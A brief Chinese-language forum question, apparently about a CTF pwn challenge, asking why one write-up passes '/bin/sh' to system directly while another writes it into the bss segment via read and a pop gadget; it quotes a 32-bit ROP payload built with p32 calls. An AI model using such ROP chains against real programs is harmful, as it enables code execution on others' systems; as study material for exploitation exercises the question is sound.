為什么不是跟教程的這個(gè)wp一樣直接傳參?
提問者:路否大客戶 2020-3-7
為什么有的這類跟你這個(gè)很像,,但是這個(gè)解題方法用不了,,而是在”bss段寫入/bin/sh,用pppt來(lái)調(diào)用read執(zhí)行
1 2 | system”payload3 = 'a' * 112 + p32(read_plt) + p32(ppp_addr) + p32( 0 ) + p32(bss_addr) + p32( 8 )
payload3 + = p32(sys_addr) + p32(func_addr) + p32(bss_addr)
|
為什么不是跟你的這個(gè)wp一樣直接傳參,,謝謝